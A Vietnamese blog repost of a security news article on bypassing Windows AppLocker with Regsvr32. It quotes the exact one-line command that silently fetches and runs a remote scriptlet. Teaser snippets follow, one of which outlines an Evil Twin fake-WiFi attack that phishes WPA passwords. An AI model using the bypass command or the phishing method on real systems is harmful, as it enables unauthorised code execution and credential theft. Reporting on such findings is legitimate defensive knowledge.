Chuyển đến nội dung chính

Windows AppLocker có thể bị vượt qua để thực thi script từ xa

Windows AppLocker của Microsoft, tính năng an ninh trong Windows 7 có nhiệm vụ xác định những người dùng có thể chạy ứng dụng trong phạm vi một tổ chức, có thể bị vượt qua để thực thi script từ xa trên máy tính.

Khi AppLocker được đưa vào Windows 7 và Windows Server 2008 R2, quản trị hệ thống có thể thiết lập các quy định cho phép hoặc từ chối chạy ứng dụng. Những quy định này có thể được áp dụng cho người dùng hoặc nhóm người dùng cụ thể và có thể được sử dụng cho các tập tin thực thi (.exe và .com), các script (.js, .ps1, .vbs, cmd, và .bat), tập tin Windows Installer (.msi và .msp), và tập tin DLL (.dll và .ocx).

Click image for larger version

Name: applocker.png
Views: 1
Size: 45,4 KB
ID: 56300

Để có thể vượt qua Windows AppLocker, tin tặc phải kiểm soát được vị trí nào đó trên máy tính mục tiêu và phải sử dụng Regsvr32, tiện ích dòng lệnh được thiết kế cho việc đăng ký DLL trong registry, theo nhà nghiên cứu an ninh Casey Smith.

Nhà nghiên cứu phát hiện cách tốt nhất để vượt qua AppLocker là đặt khối script vào bên trong thẻ Registration và sau đó sử dụng Regsvr32 để thực thi mã. Theo Smith, đoạn mã trong thẻ đăng ký thực thi việc đăng ký (register) và hủy bỏ (unregister).

Lợi dụng Regsvr32 để thực thi script mang lại rất nhiều lợi ích, vì công cụ dòng lệnh này là proxy nhận thức, sử dụng TLS, làm theo các chuyển hướng, và cũng có thể được thiết lập để chạy ngầm và không hiển thị bất kỳ thông báo nào.

“Vì vậy, tất cả những gì bạn cần làm là lưu tập tin .sct tại vị trí mà bạn kiểm soát. Từ mục tiêu, chỉ cần thực thi lệnh regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll. Để kích hoạt việc vượt qua, đặt khối mã, VB hoặc JS bên trong thẻ <registration>”.

Nhà nghiên cứu cho biết, việc vượt qua cũng có thể được sử dụng để gọi một tập tin cục bộ, và việc thực thi script từ thẻ registration không thực sự đăng ký đối tượng COM, có nghĩa là sẽ không có gì xuất hiện trong registry. Nhà nghiên cứu đã tạo ra một tập hợp các script proof-of-concept có thể được tải về qua Regsvr32 để mở một backdoor hoặc một shell trên HTTP.

Có trong cả Windows 10, AppLocker được coi là một trong những tính năng an ninh quan trọng nhất trong nền tảng này. Theo Microsoft, AppLocker là một trong những tính năng của Windows 10 cung cấp các giải pháp giảm thiểu tương đương (hoặc tốt hơn) EMET (Enhanced Mitigation Experience Toolkit).

Đây không phải là lần đầu tiên tiện ích Regsvr32 được phát hiện cho phép kẻ xâm nhập khả năng thực hiện các hành vi bất chính trên máy tính mục tiêu. Trong năm 2014, Trojan ngân hàng Neverquest cũng lợi dụng tiện ích này để thực hiện module DLL của mình.

Theo SecurityWeek

Nhận xét

Bài đăng phổ biến từ blog này

Fake WiFi Access Point

Evil Twin Methodology Step 1 : We will first scan the air for a target access point. Then create an access point using airbase-ng with the same name and channel of the target access point, hence Evil- TWIN. Step 2 :The client is now disconnected repeatedly from the  original access point and as most modern system’s setting says… “Connect back to same ESSID(AP name) if disconnects”. This also happens because when the client disconnects from any access point it starts sending  probe requests  in the air with the name of the access point it connected to earlier. Hence  BSSID  isn’t a barrier, you just need  ESSID  to spoof the AP Step 3 : Clients is now connected to the Fake WiFi access point and now client may start browsing Internet. Step 4 : Client will see a web administrator warning saying “Enter WPA password to download and upgrade the router firmware” Step 5 : The moment client enters the password, s/he will be redirected to a loading page and the password will be stor

13 dấu hiệu lãng phí cuộc đời

Khi còn là 1 đứa trẻ, bạn luôn mong muốn khi lớn lên có thể trở thành phi hành gia, ca sĩ hay kĩ sư? Nếu đúng vậy thì bây giờ bạn đang làm gì? Hy vọng rằng mọi thứ diễn ra đúng như bạn mơ ước. Nhưng tiếc rằng, với hầu hết mọi người, câu trả lời là không. Dưới đây là 13 dấu hiệu cho thấy bạn đang lãng phí cuộc đời của mình. Sẽ rất khó để thừa nhận nhưng hãy thành thực với bản thân mình. 1. Bạn dành thời gian làm những điều mà mình không nên làm Chơi game. Xem các chương trình truyền hình thực tế. Lướt web. Ăn quá nhiều. Uống quá nhiều. Với mỗi người vấn đề lại khác nhau nhưng danh sách này còn kéo dài. Hãy nhìn nhận cuộc sống của mình 1 cách nghiêm túc hơn. Phần lớn thời gian bạn dành để làm gì? Nó có xứng đáng hay không? Nó có giúp mang tới cuộc sống tốt đẹp hơn hay không? Nó có làm nền tảng cho 1 tương lai tươi sáng hay không? Nếu câu trả lời là không thì bạn cần đánh giá lại những hoạt động hàng ngày của mình và thay đổi ngay. 2. Bạn phàn nàn quá nhiều Có những người t

How to Fix Windows Error 0x00000709

add a share printer error 0x00000709. Follow this step by step guide to learn how to fix this error: In this tutorial, we will teach you how to fix the Blue Screen of Death Stop Error 0x00000709. The error "0x00000709" occurs when you try to connect a shared printer over the network. The printer exists but you are unable to connect and you will get this error. Step 1 -- Open RUN type: \\192.168.1.111  Enter Step 2 -- Open the shared printer When the network path window opens up, double click on the printer. A pop-up window will appear and will show you the error: "Operation could not be completed error 0x00000709". Click on the Ok button and close all the windows. Step 3 -- Go to Devices & Printers Now let's resolve the error and properly add the shared printer. First of all, open the start menu and click on Devices and Printers. Step 4 -- Add a printer In the Devices and Printers window, click on the Add a Printer tab. Choose to add a lo